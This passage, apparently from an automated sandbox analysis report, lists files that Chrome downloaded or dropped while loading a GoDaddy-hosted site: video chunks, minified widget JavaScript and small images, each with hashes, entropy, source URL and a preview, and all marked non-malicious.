                                      Size (bytes):1048576
                                      Entropy (8bit):7.5480738656578055
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:F2E0A018F2D7B54936A463B088D55203
                                      SHA1:49E6E54CF9F574924E6ACFA38DF106349C5DCB2F
                                      SHA-256:0104431E548A91F8CF36FEEA23AECB7C842FA1B262C82E5A4DEE631069F19875
                                      SHA-512:EC2C65193A1BC5C78A21BC3E1879C71BFD7496C28B79203DA379207A81961E11E9C1900BC4A280E7C5F08F39F86282432E62A012C09401EAB86DF87236B7FE6D
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://websites.godaddy.com/categories/v4/videos/raw/video/uA41GmyyG8IMaxXdb:2f83d80d859def:0
                                      Preview:....ftypmp42....mp41mp42isom....mdat........!...................................................................................................................................................................................................................................................................................7..............................................................................................................................................................................................................................................................................o...........................................................................................................................................................................................................................................................................................................!............................................................................................................
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text
                                      Category:dropped
                                      Size (bytes):324
                                      Entropy (8bit):5.376083689062415
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:ACD4F2B6117E5054FC9BF848AE8121CA
                                      SHA1:AE4D5F41D854BA8D99A4A1EC6EE6D6C3C0A859B8
                                      SHA-256:66774F89FCFA5674BE9AEF60E3FE3CB81E4DD88246BDE4E5392DF8B99FEFD4DB
                                      SHA-512:906FC9144D4AB81E8000CBE4A7AF7AFF775464347449193337E8738D705888C02B9476E083B3B67BDB3CBC312AAC4644C10737BC1FC5F9F08B38F5F45A2410F9
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:define("@widget/LAYOUT/c/bs-legacyOverrides-42582241.js",["exports"],(function(e){"use strict";e.g=function(e,i,n){let o={};return"MENU"===i&&"h3"===e&&(o={color:"highlight"},"menu3"===n&&(o.fontSize="large")),o}})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=bs-legacyOverrides-42582241.js.map.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:data
                                      Category:downloaded
                                      Size (bytes):1048576
                                      Entropy (8bit):7.888023281646248
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:AE7168DEC9C087D77B857A678E4F443D
                                      SHA1:3CF93D813F8BAF91D60B4317FD67C721D4C8CC0A
                                      SHA-256:009F9CFE8937BAB3D2536221BC8BC84DCE61F1C6B5978FE912CF2CE5439337EC
                                      SHA-512:AF05CBDCFB1A0D25941CC154F85EEAE8BA36356E565C3D39F64DDB7EA9BD00F96355CB4EE384F8C1A569CD97B6D792D72690452CDAB7B2811777C1DCAD2B16CD
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://websites.godaddy.com/categories/v4/videos/raw/video/uA41GmyyG8IMaxXdb:2f83d80d859def:25
                                      Preview:..F#....).(a....a.......X....u.{...]\.4...}..g .=ET.''..h....^."........p...k....X.M)g.y.u._..L..~Y.D.%..2|`)]..N.Z.*.s>......_*|.[..d~!...............CUW.b1....(.s.2.>..S[...N.+jE....8#...n.,.Jb#.q*.+q....-&a.Uz{..).E.a.dT.2....y..V.X.G..W.n."..M .A...+.zA]~.T.....`.....k.L.$...=.X~..[.,a....c.9...g|...FE..z.$e:..$FN.s2./o.|.{....:.wC..Rq(...<...S....f.....VD.G.2.0v.G...1...eM..^..y......W3.T.n.`9....b.....9..c..9h...%...*.....*..........{...X.c...@Nd....L.A..t.k.....Q.~...5Ov0...j.Q..%.?D.ta&.a.G ..,.\....3.......4..sf.w.....;.o.R.........v...........U..]W...q....X......N...&7..g..(.8.,B......8.."....e....(r....C..<f..U'TK....[^..}}=.M..+...Je>...T..c.)%..ED.....H..jFn...=.k....|..Z..9.f..:G..r..&......?{kZ.xCK...r...a.....r.._1ArI..Z..'?}1....V....a...g0;...%..r[~.>...&.W....5V+ea..?,q....@.......Vr..(.Z.@\...T...F.}........'..n..8.cg..9...=pC!I..o..xC.......<.ex.. .S.k.....q.RZv....{.u9.0&|..%....$.n.wr..C.#.a.D..v......
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:data
                                      Category:downloaded
                                      Size (bytes):1048576
                                      Entropy (8bit):7.978359969519043
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:7979CE45FE31AE628D2866CF3ED69401
                                      SHA1:FF3A2BB279E0F90115C352DCFABE0F774FA0FA9B
                                      SHA-256:58BF0F9CCD091A7B046593238F21A9AFED84EE61375CF87336E359F575A2A0AE
                                      SHA-512:F2A915BE335DAA11CDB0BD09F07B3BBE4512B1881BE743526574323187EF4807FF7A1C53D7A6A45E0A71474718E357A79BB577A614C750584D083E9D19717AC7
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://websites.godaddy.com/categories/v4/videos/raw/video/uA41GmyyG8IMaxXdb:2f83d80d859def:24
                                      Preview:G@........_....Q......p....y.<#..'."....^.4.0H.J...qg.....}.c..6T..C|.1...Nk.B.q....k.I~...AV..V...r...I.....5..6....BD.C..\..#M...=*.\....O.....7z.H.Xh.Y%X.W.....aZ,.].j:?......@5>.@......O5H:.)`.m8.'o.7..|..._.....P.7]L.....W.....2f.*.~...k4..^_....!..N.k..e.y..(..KV...W]...j..........;..|..@.|...L0...).0:..S~,Yu..j%LD..8..j....R...0.....c..K.;..@).Q..v.g,..B..V.e..~..A...Q...D..Q.......A.W...G.#b9n}.z.h..5......hL.+_..........{.T..........^..W'.-.E...h.~.@/.....OBm.5.....)...qu.....t.M..t.5...L..r..W~.g.~...0P..t......V.&.u.....)..?rjLbuD....f....o....g>/.9%8./...D}L...J.w.. .-.5.>qy.|......\....4......6.<H.....}?.3H...."...$.c.+.e<4}..\.G.......G.....?.$~.."x=$0.]...p.B._.Q?......%^AxH;....G.f#.N.f..PJ1.7xc_0W.\.G.....{..I.hNR.}`n..*...t.P^...'..........YOp.........qE95P'..r..|...$..YM........`...M.E.}LO..G^.8}yI.aBN.qC...u..n....B..M..1..:d..5q.J.o}M....$.<C.9.G..f.Q..`..y.;%a........$.}.6.L."N\..O.Rgpe..m.i.1..(..g<..V...{..S>.:..
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:data
                                      Category:downloaded
                                      Size (bytes):1048576
                                      Entropy (8bit):7.939328943252062
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:6B297CBC99F899DB884022F6E567312F
                                      SHA1:84751EEA3DA819AD6597E06ABD52CCC4F283489A
                                      SHA-256:10E471F0F5F07CE388F11AE084910CB30271B6CB228CE97D9D970355FD907834
                                      SHA-512:A6F69EA80B55D1F7FE5974AE2507FA7212FD740185ADADBA4FD7F6F7E60296E40FFB6E0AC23F51CD10D32B0DC15B595D9255344FAC2462C1ED0B04B3DFA397D5
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://websites.godaddy.com/categories/v4/videos/raw/video/uA41GmyyG8IMaxXdb:2f83d80d859def:1d
                                      Preview:8L.q.~..2..@"^}k..%..{.vZS..G....b.m/..h3. .,.....j..B......zW....Q...@)$.b..[etV..+..i..^.1R....!(...U.Y.?.m.i\B..|z...K.(CY.3ap......lk..o.>..Ot...2.w/L4.. ...{O\.../...V..e". ...{...d...... .....V{(..H[....G.......9.`...I.Q.L..l.!.....G...zc.x.o*..U.....2e..(/..........M.....#.m.#.t...7.t...D.#.6g.h..rB,.y..N.K....."..h{....:...b.TAS9.% .(]..v+G.'..R.....Kj...^..M.3?Z.{.n..w9.")..T..yr.[..f..h....L._i......r......+.M.6.z=...P...D{.c.v....RE....@.......i...2.[.t..vR[.&......M..Ih.^.!....E}.!j+.H.R.=.....u.y(.nLc....,..-..kMpa.?...<qD...-1...."...|....?...9)..G?.Y%At.a.f}...?.M..].uxU....(.,.;..b..5.jm.......P...N.6.*a.W..A/iUZF...z.=.."EX.Bm.}K..y.3$P.$\.........6....<..n..t.....W_/.C.......u."m..2m.t6.X....N..d.&...N..IV3.....-6...q..q..[...XM..T<]~......3"=.%,d..->>x3D.1.zk....6C.Y......#...Z..DV..1..D\K....%>h..Z9..aU...i}..O..j!.g..*...p.k.....HK..g.~k...k......[..S.99.r.Y..J.....dV.4..rA.....wB...bO7.Qy..{.....2...v...)]>..5l..*q
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:data
                                      Category:downloaded
                                      Size (bytes):1048576
                                      Entropy (8bit):7.936916792773906
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:E63D208698B627DC27AC65E4B6C0183D
                                      SHA1:5C0EC38C7F8E9B7D23E4E1DCCAE3EE1150DB5631
                                      SHA-256:70771F9FEA1BCA5D322DA29E0B3086CCFDE5C119107006FC45DB02BA3387DF7D
                                      SHA-512:5231ABB9509B1EDAADCCC97D0072DD9CC6A141A2F52AE7C9D86801A6CCA2A143D3113132EEEE579D604367A3FA29ED9FC832DDF37D1CE2371CA666385A0F56BB
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://websites.godaddy.com/categories/v4/videos/raw/video/uA41GmyyG8IMaxXdb:2f83d80d859def:2c
                                      Preview:..........P..X`n{~...3f{.6j9c.@J.F.[......b...V...._..1.Z.....%'.."......\.......kI.W.l.......:..S....U..../.. ...i......qs. ..b."..eD.a......L.S.{..fh.TWs...^/m...0.1A.z..b..k.u0....1..f.\Jq.".5&=....B(.0..._"...BquI.p'.v..g..mq...SB.}o...Q....g......a.1....OP.A.....V...!ZkG9...!u...h.w.TMw.o....*.....CW.N.t.w.8.....=.Z.ae.Q.k^.u...........uO.C...b/........ME.g.`.?U.........{...#-..lf..f.....+.........._...LJ........=P...T.W@Eg..e..\.).]+_.y...&.P.b.....u.M0%#..........1aR$j.GY..<........g...Z.).C,H..|...e......W.>.8.&.t)G.[n.....E,.)0.....Z}...>...K....M .<x..F.y..B........\b..*.T........#]J...A.....v^..Q.~.v....%...N....nQ./...I.9...t\{[A+.Ie...].W.=...^Y9.+'...J$....)..&M...iQ..zz.zwu..=.0..N'.x.......j.O'...@g..N?..+@.S.%..m...V.g.2.M. ..9=..ebN...y........;...dAu.....#.h.bj....p..CFk.z;W.i.BM....hY.wY.....v.q..kOm+..t.'....$...PQ.......GO....,>.._.Q'. .X....H].-.m.k.*..7.az.v.4.-.?0!.4.]x...j...[1;.P../;S$..9...,.(..8.L....]...&.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:data
                                      Category:downloaded
                                      Size (bytes):1048576
                                      Entropy (8bit):7.884444951561292
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:423FD86F1615D377605B66651BDF76A9
                                      SHA1:A4954A8E76B87E3BD7B1A2E027A9F74620ABD676
                                      SHA-256:20CC6B752B5701ED2B5DF28C45E60D7CAF4C46AF8BD8E5B80536B351075182A7
                                      SHA-512:0B599AFC105A72CA978A668DCC71866A722C8FF3477FA14F6E5DF23C36D429249A5A0C5FC10B451D72C07BCBE0F251FEFB53C21C5A21F789002C0DEB264A6A38
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://websites.godaddy.com/categories/v4/videos/raw/video/uA41GmyyG8IMaxXdb:2f83d80d859def:20
                                      Preview:.)S...!.:.9k..0.....?0..m...d_j........Q...<.>...p...\.a......8\.x.6....(...._...(.f.-..y........m&...c}...Um.......;r......Ot.(.a.&.y....V!.y~..{....d..;......G..^,J.....S2h`:7..@...1....b:...X1.....^L_F..4../....4u..f.`E8.....5..g.t..j.`....-..q..].6.e..&...{5Y.:...Mk3.`...=..[...'A..?.....a..0..r_}....NI(er1.t.u.ug..>.v....2.[..z..P.......V.3..d.G..-...F.....A...;.......eA.dJ.....g@...9..b..@.$..j...S.`y..M5..P.[3~Eh.{U....V"..u.O.]..G9..E..,...#...v."!.[.z.A.6..XuN...XJ.........L..>.+..I.:.P8..f\.G...[.2...=......D...{..U%@B...u.n..~F..>N).[.t..(.O.... o....Px...*Q..0..c$..u.......i....h..u..b. .!.c/-.:.5@..N.9.....\..x......TL.....7.S."%U...Y..).0..'[.._.....0..H..w....~.`..E.../.o$@.j....R....:.%QK.X.a.7./.B...3..........~..N..S. ...........8.!.S....1.gtp.Cp..1.D.r."\....M..KD.\/i.9..hc.?.....:.o.Z.i....9.0.uE..w....M..)...{...{...k...,.%d..W.r.n1..ra....S.2.XfF.......<..*.lP...?.......<....6n.g......J.{.XG.`...... ..3.Z.!.<..;
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (3043)
                                      Category:downloaded
                                      Size (bytes):3092
                                      Entropy (8bit):5.221416224205306
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:852CBC5322260E00B44F2C682F88B2C7
                                      SHA1:BCAF229E6134F43EB5F974C9891E4D16FAF1D344
                                      SHA-256:BAE437DBEFE58377D88C9D579DB7C59F4202F3FBF88866D0005FB375BE6B2CD7
                                      SHA-512:F031B43F7FA0DA001F71DDCFFE5E322A94C5F1F52F7C4D67D34880243D9D361AC55C0E5001DD004390867CB31E5DEF5D4D9282E6E2ECB9AEC0E880AA5B786BA3
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://img1.wsimg.com/blobby/go/static/radpack/@widget/LAYOUT/c/bs-loaders-fffeeba5.js
                                      Preview:define("@widget/LAYOUT/c/bs-loaders-fffeeba5.js",["exports","~/c/bs-index3"],(function(e,a){"use strict";e.B=function(e){const{SVG:c}=(global.Core||guac["@wsb/guac-widget-core"]).UX2.Element;return this.merge({tag:"div",children:(global.React||guac.react).createElement((global.React||guac.react).Fragment,null,(global.React||guac.react).createElement(c,{viewBox:"0 0 44 44",width:"3em",height:"3em",fill:"currentColor"},(global.React||guac.react).createElement("path",{fillRule:"evenodd",d:"M31.968 23H12.032c-.57 0-1.032-.448-1.032-1 0-.553.462-1 1.032-1h19.936c.57 0 1.032.447 1.032 1 0 .552-.462 1-1.032 1"})),(global.React||guac.react).createElement((global.Core||guac["@wsb/guac-widget-core"]).UX.Style,null,a.k.loaderBalance)),style:{"> svg":{animation:"balance 1s infinite cubic-bezier(.62,.06,.33,.79);",transformOrigin:"center"}}},e)},e.C=function(e){const{SVG:c}=(global.Core||guac["@wsb/guac-widget-core"]).UX2.Element;return this.merge({tag:"div",children:(global.React||guac.react).crea
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (1211)
                                      Category:dropped
                                      Size (bytes):1261
                                      Entropy (8bit):5.340315611373646
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:CB9BFA0FBDD957FBE7F4841B70341DB2
                                      SHA1:9CAD12A3580D3E4D340CB867E88B687C75564C5A
                                      SHA-256:513864FD4EBD1926F3E1E78B436A90C2BC3A5D16835B50415E7B318D7DEEC2A2
                                      SHA-512:DF98C3262F64DA4EA9CACF75FF7CB685D71B69142D89F726AB3E13CF6F25432DC395D7C0950E1632F0E519F135B02FDA0753739189E51F1C9210ACA6692551DD
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:define("@wsb/guac-widget-shared/lib/components/ColorSwatch-4196a0a9.js",["exports"],(function(e){"use strict";const o=e=>{let{color:o,isActive:t,inStock:r,isSmall:l}=e;const a=r||void 0===r,c=l?"24px":"38px",n=l?"20px":"32px",i={borderRadius:"50%",borderWidth:"1px",borderStyle:"solid"},s={outer:{...i,display:"flex",alignItems:"center",justifyContent:"center",width:c,height:c,borderColor:t?"lowContrast":"transparent"},inner:{...i,borderColor:"ultraLowContrast",color:"ultraLowContrast",width:n,height:n,background:a?o:`linear-gradient(to left top, ${o} calc(50% - 1px), currentColor, ${o} calc(50% + 1px) )`}};return(global.React||guac.react).createElement((global.Core||guac["@wsb/guac-widget-core"]).UX2.Element.Block,{style:s.outer},(global.React||guac.react).createElement((global.Core||guac["@wsb/guac-widget-core"]).UX2.Element.Block,{style:s.inner}))};o.propTypes={color:(global.PropTypes||guac["prop-types"]).string.isRequired,isActive:(global.PropTypes||guac["prop-types"]).bool,inStock:(
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:data
                                      Category:downloaded
                                      Size (bytes):1048576
                                      Entropy (8bit):7.9785598536470905
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:82D69D9EF1CE3D93B9D341D8E5711A4D
                                      SHA1:E4A665B819FE72C47187A7FCDBA8EFE00E70335A
                                      SHA-256:4635B1CFFD9D466C19F9F0660A3D12D93D3B518C4FDDF4AF0B6EB9072AFD27F0
                                      SHA-512:AFEF656877409B0F68CDA186F89717645F952FC5C4B718E1154A4994C36E98F08FE3CCFC55E0095B1EDF84C9B16BBD46F360646CA5326C1DF67BB93E38E628AE
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://websites.godaddy.com/categories/v4/videos/raw/video/uA41GmyyG8IMaxXdb:2f83d80d859def:9
                                      Preview:..<.8,"..C..."..J.vN;..-.........Q.2...Me...o..l>=..-...x.+.......:....7.3T.".BL...f...H..g"....-^..?..n.uu.v._A...q.Bw...-.+.._..f..w.......D..~S..h.....~.*G.].........pIv".".T.k8.E.O...MV.|U.A.%...*..#.d.c.....8....e..n..)...m..m...[...k..q."f'._.w.O..'*..X.[.3..`...#.....u.h.H._!]..\..U.E........g..98....pd...R...?....FAF.=.....l..'o..D..^.#.H.}..=..>....`6t.......-..../Z.U.=8....4....^.P.=...3..-..:'$M.5.e..\. N.tL...Ff..R.{........=.*p.H56.;.e..p.(<....c.~..e.R.E.V......v$a......J.wd.........D@..n....Bc.l./...d!..Km/og.G.|..........b.....Qa.4V.<.,..lL.~]Q..)Mv..,....]x2...c...1..h.).K9.h...'.\. .]..6M.0.u...I.-k.}N....I]..7...Y. .."RpN..l......~q..(....M..n..\'/....{..%.l...@|..&v...]c.).c}.L....9..b..v]'.....*.A..;.#|..7(.d.^4.k.;.j1.......4p4i...9J...d.5....1...G..(.A.Ot-......!.T.q..4..{.....|...D....9"......G.Kqw.(...P..8v.Lo,@..!q..y.![..M......Q?E6...'...TUR.TWj/..".V..7!.D..m<..0.....].Z........U..cU.2..c./g..u....|..u.......
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:data
                                      Category:downloaded
                                      Size (bytes):1048576
                                      Entropy (8bit):7.887987266868701
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:69173F5962606F7C3FDF87E7DC52F2EC
                                      SHA1:34E1E78A676FC07C968BF31E791422F4D208DD55
                                      SHA-256:B45B4EA6B8275943DD13164B828174A6EC35D2596954CCD969D9432302A01454
                                      SHA-512:E489612085AE29C8C32DF71749EA0E1694666B712E8CA6F7B4DB98A5A9846549BE852E9A4234DB80F58E42863BF15F455F3BD15706989BDB67F08E68B03884A1
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://websites.godaddy.com/categories/v4/videos/raw/video/uA41GmyyG8IMaxXdb:2f83d80d859def:5
                                      Preview:=.2y.$g..*..]..........,e66..........C:....g.d...s........A.m..|.....G;.O_$l3r.Z.zM5..U..n.P.U. .].......k..b.0...[.#...6.''..\..K{2R...h3Nd?.a9..O......vB.X......zQ.x....U.7...Y..|.'..Z.......B.{C.......YD.x.v.~..N...t...I.....b....+.....>p.Q(F.H./....R..........,..e..f{..@p.!.v....`%.......9\go^.(.s6.#...K...}.f.L./X.|......jC..l..k/WD.)....Xq#.!).r....Y. .E}7.q{.+,..$rn8...5.a`;[...c.toM.<.^.e.Pf.f..........==,..s."y..w......t..XN......d....Td.z..4.F.Km..7..jA....R..M;..4..f...>......d.r..e;Se.%....o.}Y......i.......^......<...._......RRj z....v..q.cv] g9...../+.J...A, .i..p............3~......}:.;YK.6.#.|...8{.a.:.Lb.i..o6vA.Y,./....hl.......3....o..w.4uD..Z....+........:...L.a..D{>FY........ S.....I..u....M4.i..k$%...)N*.?.t.C.nQ.7......[X(....N.Q.9.......7...v.....U"....l.69.S.....:..d7m.7..sU./..My(?.!.a65L.#..SQ...mb....]+f.t..@I..~-..d.:.f?..^..2.`..1....8.....>.:....!Q..vZ.bc..tS'V....l..l.u.|)..N.;.c..#;...O..B.....2..."..M.....n.. ..n.r.P8.A..
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:data
                                      Category:downloaded
                                      Size (bytes):1048576
                                      Entropy (8bit):7.888310775083395
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:933B3BD63C3A360026879BAA009DF87E
                                      SHA1:3004F973D2E89EC699F898CF74BC23E38D20B750
                                      SHA-256:F408463A314C8EBBC5F88ED2E32DF9D48790202B54089B6658D219E41C3B741E
                                      SHA-512:C5CA6ADE7E712679DA1C7FA440B6C39F7DD94970D9951A3A892E343C3477BE302295ECFD3B075C4BFE1C237ED7F3F5C7983F91DD7820A56423708384190FD1C0
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://websites.godaddy.com/categories/v4/videos/raw/video/uA41GmyyG8IMaxXdb:2f83d80d859def:23
                                      Preview:.y.L`..ZsU.....S-....s..fmd....9a.x...2.[...>.<..T.W.g.u...r....^.Z.[)..t.0.9u^.n. .>8~Hm.. s.gG.I..u.a^.A.7..i.,.e..[...l.<4.C...AM....0.r....'...J.N...u/....N.j?...].M.?.....u.......B...t.S*.....9..yC.....2......h.JMV......T5.Cp...*....M..6.1!..........y.|`.P..p,..5....E..P."...X.9h.7.V.9b......G..!g..#..Q.0A.f..r..W7~...<d....v.P+M.....$XI.#.R..Z.2>DXt.:#<lZ..,..x]..|.-/..L.E.....\....m.D.....>.......!(..-....fn..7t..`..@+../..".k.,.hgv..=....t[..|.-<...._.m...B..Y..2.@......T.t.p..h......&.._nv........7Y.3gp0..T[.Y|y.....].4.5-I.B..L..:d_..]>...B.......{...p#W....T=....n.....h.x..i...$XQ^R.sn........T..D.fR.Fg 2l.$.O.3....".oK7...-.x....A..y.}..\...?..fT .L. ...Q.......a...Y.8.H..!.y....^..c.....1y.R.......2...m........S..=;..(.......; .........Y].`..'.. .DUM..k.....=......0....d*.;.G.p.:...A..:Y....iK.n.On..ck..yd....7...P.C.,x. ......Ef....#....].t......s.'........|.:]}\...h........T...H.).....$.>r..O............J....(...U..
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PNG image data, 53 x 4, 8-bit/color RGB, non-interlaced
                                      Category:dropped
                                      Size (bytes):61
                                      Entropy (8bit):4.035372245524405
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:0D58AD029A53E17B50510C08E21C3822
                                      SHA1:955A2746C62090D4BFDBDB78AE2B7F52AF69C62C
                                      SHA-256:CB0973B3A6B8B91636C948D3437AE986C46C1392BE056B146F017375D44015F0
                                      SHA-512:61C5BF6DEB5C9C3A0C913EAB3A105B15BAA3A38E860012C8903EF3881653037BFB7A669379603248721CBC148DCA3418EF2AC5B4CB4F422CEBF850BA7C3C2889
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:.PNG........IHDR...5............/....IDAT.....$.....IEND.B`.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x266, components 3
                                      Category:dropped
                                      Size (bytes):26982
                                      Entropy (8bit):7.960603534982635
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:910E168A2CF7E1EB059A21E2C9B91C4B
                                      SHA1:EA0E407C7B39D580FF2ADA669FFD1911E660436D
                                      SHA-256:4DB588714B1D8440701FB972DA5232EC6877CFEA417A3BC03A55B50FDC04C5B3
                                      SHA-512:55EDE1BAFC2D93753F3B8FB2C69E5FF8F1203D2B2C07D70364BB9E731ABCECA6D492D15902984B84D7AD79A757905BF55186F528096DF66DB00341D9F0CB5E3F
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:......JFIF.............BExif..MM.*.......i................@...........@....................C.......................................%..%....)).%756.*2>-)0.;!....C...........,...,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..H......o.37.j.s.n..*>+blI".]/.|H.M.Y]0[...2.3...t;...p.EW.2>e..S%....Oc....h.z...o...#.o...k..\.,j3.?.?..}+....(r.12}h....!..|..Rb...'4.B)..s.I.z..I..a.jo>..B(...sO......4..".V.lFwSI5)..).V#9...B..(..M,pE4.X...@.2My..9y".....=...}......1......].......!...n... .2/....y..u%....-#.......(l...f.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                      Category:downloaded
                                      Size (bytes):61
                                      Entropy (8bit):3.990210155325004
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                      SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                      SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                      SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                      Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (13834)
                                      Category:dropped
                                      Size (bytes):13891
                                      Entropy (8bit):4.645788246161265
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:C7B1DBB0EEF8600D5F57536998855E4D
                                      SHA1:03908243C34D5A373ACBA694EB16E30F088B4F7D
                                      SHA-256:53DA7DD341F1EF0C484A7B56A17D86669287DA5D082AAA8A0AF04FD3816B6631
                                      SHA-512:56EE4961F4C03A15C79252AD9C3CAD93573AC785881541EA32F83389996F4E8C074FBC397FF9F0B218121A3D8E1A9CEF101D088B4BCFB2353D6A311D5F60DCBA
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:define("@widget/LAYOUT/c/bs-modernThinRound-ced97fbd.js",["exports"],(function(e){"use strict";const a=(global.React||guac.react).createElement("path",{fillRule:"evenodd",d:"M5.643 19.241a.782.782 0 0 1-.634-.889c.317-2.142 1.62-4.188 3.525-5.244l.459-.254-.39-.352a4.89 4.89 0 0 1-.797-6.327 4.747 4.747 0 0 1 2.752-2.003 4.894 4.894 0 0 1 6.092 5.72c-.211 1.042-.802 1.97-1.59 2.683l-.308.28.459.253c1.876 1.04 3.185 3.131 3.53 5.26a.765.765 0 0 1-.742.883c-.367.005-.697-.25-.753-.613-.52-3.384-4.067-6.087-7.702-4.324-1.628.79-2.714 2.511-3.014 4.313a.76.76 0 0 1-.887.614zm2.873-10.36a3.36 3.36 0 0 0 3.356 3.355A3.36 3.36 0 0 0 15.23 8.88a3.361 3.361 0 0 0-3.358-3.357A3.36 3.36 0 0 0 8.516 8.88z"});var l={__proto__:null,account:a,person:a,magGlass:(global.React||guac.react).createElement("path",{fillRule:"evenodd",d:"M19.504 18.461a.76.76 0 0 1 0 1.038.652.652 0 0 1-.956 0L15.2 15.993a6.142 6.142 0 0 1-3.83 1.353C7.858 17.346 5 14.353 5 10.673 5 6.994 7.858 4 11.371 4c3.513 0 6.371 2.994
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:data
                                      Category:downloaded
                                      Size (bytes):1048576
                                      Entropy (8bit):7.936982598585011
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:E5F9283AA65AE0C84308E33EECF92392
                                      SHA1:9AD33573FBD250B01DC9A14EF6B4490C7402D1C7
                                      SHA-256:B910FA7298E6BA7AE05750B61B7199C32ACFB3D3E74A6923B9CDF0EFC0E0B405
                                      SHA-512:524C6D1CD30F38CAF8C6B6B1C797D42FF2C214CD60D8A55A94BC7648AFFF0D168714BF2E0CDA1F39F36DCB16C0517AB28CEB4DC38CC632F8AC40F7698CFFDBAD
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://websites.godaddy.com/categories/v4/videos/raw/video/uA41GmyyG8IMaxXdb:2f83d80d859def:14
                                      Preview:..J....$r.$. `...H...+N.G^.*.o....r..0`*.M.b.....Qc.][ .{....]..v..1.1;....n.....+WM.y.'ox^.Hq.P.Z|y}..e.yX".6a......[&t.a...i.....o..q.....C.|..1./U.P.^Y.....c~......\.....i\..6dG..m.H..26Q.h8....CT.k....Y>....bn.4YE......+.......92....U...~V.j.Q.23.a......o..$=....N{..rE..J..)..Q...q.>.{z..6,.$20.:_z.kS......w.6?.a...oI./...1.+.*t.m..k...-..f.g..Z..2..Q......y...jA8...Y.\...dz.9..I......kv......._.G....;G?.........<.9.._..FS..Q...qi.z..$...........Y}...X{S.....%d..ZK6D...%.X.#..\*....:1.K.lL.~....t.l..Y.E..`.......N...%.....W.".....,n...o?.$fa.P...y.F9H.....5.....8.B...#......8v..)u.x....N.b....T.e....f'..X.....C.:}.....}h..neg.5.4.[8g..C....M.g../]....wf0<.........t.II:8..C2..7.x..c!.:...@.1...d...,D&c...RA.9,...............*x....3.P.|....R.3VM}.$...Q.......".3......b. ,./A.BB...&....=..X.....u[%.Y").....]4."...5a.....X....,M#.......e......*...&....%.....=ia.".@r.X./%...|.A..7%F..^..'..+....X.............X.Q...'.me.Rmy...
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:data
                                      Category:downloaded
                                      Size (bytes):1048576
                                      Entropy (8bit):7.887726669196315
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:19691BB3EFD7ED68288CF4835F48C005
